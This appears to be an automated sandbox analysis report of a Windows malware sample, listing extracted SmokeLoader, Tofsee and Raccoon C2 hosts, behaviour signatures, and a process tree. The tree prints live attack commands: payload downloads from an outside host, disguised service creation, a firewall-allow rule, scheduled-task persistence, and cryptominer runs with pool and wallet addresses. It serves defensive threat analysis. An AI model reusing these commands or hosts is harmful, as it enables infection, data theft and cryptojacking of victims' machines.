Analysis
-
max time kernel
140s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09/01/2022, 18:16
General
-
Target
0c7cd5a32bf32320089d44dc1a2cb8a3.exe
-
Size
289KB
-
MD5
0c7cd5a32bf32320089d44dc1a2cb8a3
-
SHA1
f5d6dbeecc9b6020a34811f5ef6310198288ffc2
-
SHA256
2b8d595d4763ee7ae46bf143f394fe9239d2a0d1a77dea9d2f69cfb5e253c042
-
SHA512
2151614602a002efedd85e158f901be5f145c75376e105a5b6071c89003294336583ec439a64c6dfa760d6709ee1cb5d6bc270355953b9390b2e19409c05099a
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
rc4.i32
rc4.i32
rc4.i32
rc4.i32
Extracted
Family
tofsee
C2
patmushta.info
parubey.info
Extracted
Family
raccoon
Version
1.8.4-hotfixs
rc4.plain
rc4.plain
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Windows security bypass 2 TTPs
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
Arkei Stealer Payload 5 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
LoaderBot executable 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 23 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Loads dropped DLL 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Modifies registry class 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\924.exeC:\Users\Admin\AppData\Local\Temp\924.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\28C2.exeC:\Users\Admin\AppData\Local\Temp\28C2.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\28C2.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\34F8.exeC:\Users\Admin\AppData\Local\Temp\34F8.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ciwxnhau\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ukuwirin.exe" C:\Windows\SysWOW64\ciwxnhau\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ciwxnhau binPath= "C:\Windows\SysWOW64\ciwxnhau\ukuwirin.exe /d\"C:\Users\Admin\AppData\Local\Temp\34F8.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ciwxnhau "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ciwxnhau2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3F0C.exeC:\Users\Admin\AppData\Local\Temp\3F0C.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3F0C.exeC:\Users\Admin\AppData\Local\Temp\3F0C.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\ciwxnhau\ukuwirin.exeC:\Windows\SysWOW64\ciwxnhau\ukuwirin.exe /d"C:\Users\Admin\AppData\Local\Temp\34F8.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\AA98.exeC:\Users\Admin\AppData\Local\Temp\AA98.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\AA98.exeC:\Users\Admin\AppData\Local\Temp\AA98.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\B8F1.exeC:\Users\Admin\AppData\Local\Temp\B8F1.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B8F1.exe" & exit2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\D13C.exeC:\Users\Admin\AppData\Local\Temp\D13C.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 9162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\F32D.exeC:\Users\Admin\AppData\Local\Temp\F32D.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\EF3.exeC:\Users\Admin\AppData\Local\Temp\EF3.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\2347.exeC:\Users\Admin\AppData\Local\Temp\2347.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\23DD.bat C:\Users\Admin\AppData\Local\Temp\2347.exe"2⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16050\123.vbs"3⤵
- Blocklisted process makes network request
-
-
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\16050\setup1.exesetup1.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 4124⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\16050\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\16050\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\3EDF.exeC:\Users\Admin\AppData\Local\Temp\3EDF.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
- Checks processor information in registry
-
C:\Users\Admin\AppData\Roaming\safas2f.exe"C:\Users\Admin\AppData\Roaming\safas2f.exe"3⤵
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobrishe_update -cclock +500 -cvddc +5004⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\whw.exe"C:\Users\Admin\AppData\Roaming\whw.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\e3dwefw.exe"C:\Users\Admin\AppData\Roaming\e3dwefw.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"4⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\asdasdw.exe"C:\Users\Admin\AppData\Roaming\asdasdw.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
39.5MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.8MB
-
Filesize
5.5MB
-
Filesize
19.3MB
-
Filesize
512KB
-
Filesize
964KB
-
Filesize
392KB
-
Filesize
4KB
-
Filesize
300KB
-
Filesize
5.5MB
-
Filesize
19.3MB
-
Filesize
512KB
-
Filesize
900KB
-
Filesize
4KB
-
Filesize
1.8MB
-
Filesize
964KB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
39.5MB
-
Filesize
248KB
-
Filesize
5.2MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
6.0MB
-
Filesize
72KB
-
Filesize
1.0MB
-
Filesize
6.0MB
-
Filesize
300KB
-
Filesize
472KB
-
Filesize
584KB
-
Filesize
5.0MB
-
Filesize
120KB
-
Filesize
408KB
-
Filesize
1.8MB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.0MB
-
Filesize
4KB
-
Filesize
176KB
-
Filesize
208KB
-
Filesize
5.0MB
-
Filesize
200KB
-
Filesize
228KB
-
Filesize
492KB
-
Filesize
6.0MB
-
Filesize
248KB
-
Filesize
428KB
-
Filesize
464KB
-
Filesize
1.0MB
-
Filesize
1.0MB
-
Filesize
8KB
-
Filesize
1.0MB
-
Filesize
36KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
696KB
-
Filesize
39.5MB
-
Filesize
696KB
-
Filesize
32KB
-
Filesize
36KB
-
Filesize
552KB
-
Filesize
5.0MB
-
Filesize
552KB
-
Filesize
472KB
-
Filesize
120KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
436KB
-
Filesize
36KB
-
Filesize
4.4MB
-
Filesize
19.3MB
-
Filesize
5.5MB
-
Filesize
512KB
-
Filesize
964KB
-
Filesize
1.8MB
-
Filesize
4KB
-
Filesize
22.6MB
-
Filesize
22.6MB
-
Filesize
80KB
-
Filesize
316KB
-
Filesize
580KB
-
Filesize
39.8MB
-
Filesize
8.1MB
-
Filesize
28KB
-
Filesize
48KB
-
Filesize
36KB
-
Filesize
136KB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
1.8MB
-
Filesize
1.6MB
-
Filesize
272KB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
4KB